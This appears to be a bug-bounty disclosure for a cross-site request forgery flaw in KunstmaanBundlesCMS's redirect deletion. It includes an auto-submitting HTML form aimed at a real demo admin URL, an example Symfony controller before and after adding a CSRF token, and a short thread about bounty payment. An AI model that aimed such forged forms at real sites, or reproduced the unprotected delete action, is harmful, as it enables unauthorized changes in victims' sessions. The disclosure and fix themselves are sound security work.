Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms

Valid

Reported on

Oct 8th 2021


Description

Cross-site request forgery in Kunstmaan/KunstmaanBundlesCMS

Proof of Concept

  1. The delete action of the "redirects" feature lacks CSRF protection; the vulnerability is in the id parameter (the redirect id in the URL path, e.g. /redirect/2/delete).

<!DOCTYPE html>
<html>
<body>
<!-- Auto-submitting form: the browser attaches the victim's session cookie to the
     cross-site POST, and nothing in the request ties it to the admin's intent. -->
<form method="POST" action="https://demo.bundles.kunstmaan.be:443/en/admin/settings/redirect/2/delete">
    <input type="text" name="kumademosite" value="4ujovmlg3srgpe6isfa6lekp2h">
    <input type="text" name="_ga" value="GA1.4.1289160424.1633619657">
    <input type="text" name="_gid" value="GA1.4.600622046.1633619657">
    <input type="text" name="demosite-message" value="true">
    <input type="text" name="delete" value="">
    <input type="submit" value="Send">
    <script>
      document.forms[0].submit();
    </script>
</form>
</body>
</html>

Impact

In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account. If the compromised user has a privileged role within the application, then the attacker might be able to take full control of all the application's data and functionality.
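The standard mitigation in a Symfony application such as this CMS is a per-action CSRF token checked server-side. The following is an added example, not Kunstmaan's code and not the merged fix: a hypothetical admin controller showing the unprotected delete action beside the hardened one. Class, route, entity and template names are assumptions; it also assumes the Doctrine bridge resolves `Redirect $redirect` from the `{id}` path parameter.

```php
<?php
// Added example, not Kunstmaan's own code or its actual fix: a Symfony admin
// "redirect" delete action, first in the unprotected shape the PoC relies on,
// then hardened with a per-target CSRF token. Class, route, entity and template
// names are hypothetical; the Symfony APIs used are real.
namespace App\Controller;

use App\Entity\Redirect;
use Doctrine\ORM\EntityManagerInterface;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;

class RedirectAdminController extends AbstractController
{
    // BEFORE: any cross-site POST carrying the victim's session cookie deletes
    // the redirect. Nothing in the request proves the admin intended it, which
    // is exactly what the auto-submitting PoC form exploits.
    #[Route('/admin/settings/redirect/{id}/delete-unsafe', name: 'redirect_delete_unsafe')]
    public function deleteUnsafe(Redirect $redirect, EntityManagerInterface $em): Response
    {
        $em->remove($redirect);
        $em->flush();
        return $this->redirectToRoute('redirect_list');
    }

    // AFTER: POST only, and the body must carry a token the server issued for
    // this session and this specific redirect id. A third-party page cannot
    // read that token, so a forged form fails the check and deletes nothing.
    #[Route('/admin/settings/redirect/{id}/delete', name: 'redirect_delete', methods: ['POST'])]
    public function delete(Request $request, Redirect $redirect, EntityManagerInterface $em): Response
    {
        $tokenId = 'delete-redirect-' . $redirect->getId();
        if (!$this->isCsrfTokenValid($tokenId, (string) $request->request->get('_token'))) {
            // Fail closed with a 403; a burst of these in the logs is a useful
            // signal that forged requests are being aimed at admin sessions.
            throw $this->createAccessDeniedException('Invalid CSRF token.');
        }
        $em->remove($redirect);
        $em->flush();
        return $this->redirectToRoute('redirect_list');
    }
}

// The legitimate admin page embeds the matching token (Twig, hypothetical):
//   <form method="post" action="{{ path('redirect_delete', {id: redirect.id}) }}">
//     <input type="hidden" name="_token" value="{{ csrf_token('delete-redirect-' ~ redirect.id) }}">
//     <button type="submit">Delete</button>
//   </form>
```

Restricting the route to POST also closes the simpler variant where a plain link or image tag triggers the deletion.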

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 months ago
kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 months ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Asura-N
2 months ago

Researcher


Hi @admin, may I know why the disclosure bounty is reduced?

Jamie Slome
2 months ago

Admin


@asura-n - the maintainer selected a bounty of $9, but with your permalinks, the upper bound is $28. I will look into the decimal bug.

Asura-N
a month ago

Researcher


Hi @admin, can you round it to $29? There is a problem here: today is payday, but I received a mail awarding $9 (instead of $28.800000000004). Can you please check once and sort out the issue?

Thanks & Regards Asura-N

Jamie Slome
a month ago

Admin


@asura-n - we will fix the bounty amount. This is a visual bug, and we are taking a look at it now! ♥️

You will be awarded only $9 until the fix is confirmed by the maintainer. Once the maintainer confirms the fix, we will work out the final bounty to be awarded, and pay you for each permalink bounty (20%), where your permalink reflects a point in code that has been fixed by the maintainer.

Let me know if this answers your questions! 💜

Asura-N
a month ago

Researcher


Ok got it, thanks @admin for your quick response.

kunstmaan/kunstmaanbundlescms maintainer confirmed that a fix has been merged on 4f5612 a month ago
The fix bounty has been dropped